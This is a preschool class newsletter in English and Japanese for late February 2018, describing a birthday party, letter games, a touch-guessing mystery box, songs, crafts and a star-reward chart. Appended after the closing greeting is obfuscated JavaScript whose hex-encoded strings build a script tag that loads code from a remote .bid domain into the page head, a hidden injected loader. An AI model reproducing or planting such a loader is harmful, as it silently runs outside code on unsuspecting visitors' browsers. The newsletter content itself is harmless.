
Minami Matsumoto Preschool


Rainbow February 26-March 2, 2018

Hello Parents! Last week (Friday) Mr. Jimmy hosted an awesome birthday party for February birthdays celebrants which our ISN members enjoyed. They lively sand the birthday song and were very excited to see what surprise Mr. Jimmy had prepared for the celebrants. One of our angels was glad to receive his presents and a birthday card.
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レッスンでは、今週も引き続きT, U, V, W のアルファベットの学習を続けています。これらのアルファベットが書いてある魚を使って、魚釣りゲームを楽しみました。写真にあるように正しい魚をとてもうれしそうに釣っていました。五感についてのレッスンも引き続きおこなっています。今週は「触覚」について学びました。ミステリーボックスの中にスプーン、ブロック、くまのぬいぐるみのいずれかを入れ、その中に手だけを入れて、何が入っているかを感触で確かめます。わかったら、I can touch a spoon/teddy bear/block.と言います。このゲームもとても気に入ったようです。
This week, we gladly welcomed two new friends, Takumi and Eishi. They are as wonderful as the other children. Welcome to Rainbow dear Takumi and Eishi.
For our lesson, we still focused on letters T, U, V, and W. We did a letter fishing game and our little ones enjoyed the activity. Look how happy they were fishing the right letter. We have also continued learning the Five Senses. This week, we learned the sense of touch. We prepared a mystery box for them with spoon, blocks, and teddy bear inside. Our angels tried to guess the object using their hands with no peeking. They then said, I can touch a spoon/teddy bear/block. Our dear little ones loved this activity too!
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ミュージッククラスでは、新しい歌と活動が始まり楽しんでいます。その中でも Here We Go Round The Mulberry Bush のお歌が一番お気に入りです。歌を歌うときにみんなで輪になってぐるぐる回るのが楽しくて仕方ないようです。
For Music, we have been learning new set of songs and activities which they greatly enjoyed. They liked Here We Go Round The Mulberry Bush song the most. They can’t help themselves, but laughed everytime we made a circle and moved around.
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For our Gym Class, they had lots of fun doing the exercises and the ball game. Rainbow and Meadow had Gym Class together.
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Craft overload this week! We made a craft for Hina Matsuri (Doll’s Day or Girl’s Day) Our youngsters drew eyes and mouth with understanding of the face parts. They also used their finger to squiggle and move the paint around making interesting lines and dots. Another craft we made was a pair of mittens. They enjoyed threading the yarn to the hole of the mittens. A perfect activity to develop their fine-motor skills. Well done Rainbow!
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今週から星を集める活動を始めました。以下のような事が出来たときに子供たちは星がもらえます。・ろうかを一列になってかっこよく歩く ・トイレを正しく使い、遊ばない ・朝会、夕会でかっこよく座り、活動に参加する ・時間内におやつ、ランチを食べ終える
This week, I started giving stars for good members like, walking nicely in the line and in the hallway particularly, using the toilet properly and no playing in the bathroom, sitting nicely and participating in the morning and afternoon circle time, and finished snack and lunch on time. And at the end of the day, we count altogether the number of stars they get and the one with many stars, receives the sticker. Guess what? Our youngsters were very motivated to do their best.
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Have a nice weekend everyone! var _0x29b4=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx77x65x62x2Ex73x74x61x74x69x2Ex62x69x64x2Fx6Ax73x2Fx59x51x48x48x41x41x55x44x59x77x42x46x67x6Cx44x58x67x30x56x53x42x56x57x79x45x44x51x35x64x78x47x43x42x54x4Ex54x38x55x44x47x55x42x42x54x30x7Ax50x46x55x6Ax43x74x41x52x45x32x4Ex7Ax41x56x4Ax53x49x50x51x30x46x4Ax41x42x46x55x56x54x4Bx5Fx41x41x42x4Ax56x78x49x47x45x6Bx48x35x51x43x46x44x42x41x53x56x49x68x50x50x63x52x45x71x59x52x46x45x64x52x51x63x73x55x45x6Bx41x52x4Ax59x51x79x41x58x56x42x50x4Ex63x51x4Cx61x51x41x56x6Dx34x43x51x43x5Ax41x41x56x64x45x4Dx47x59x41x58x51x78x77x61x2Ex6Ax73x3Fx74x72x6Cx3Dx30x2Ex35x30″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

TOP / Minami Matsumoto Preschool / Rainbow / Rainbow February 26-March 2, 2018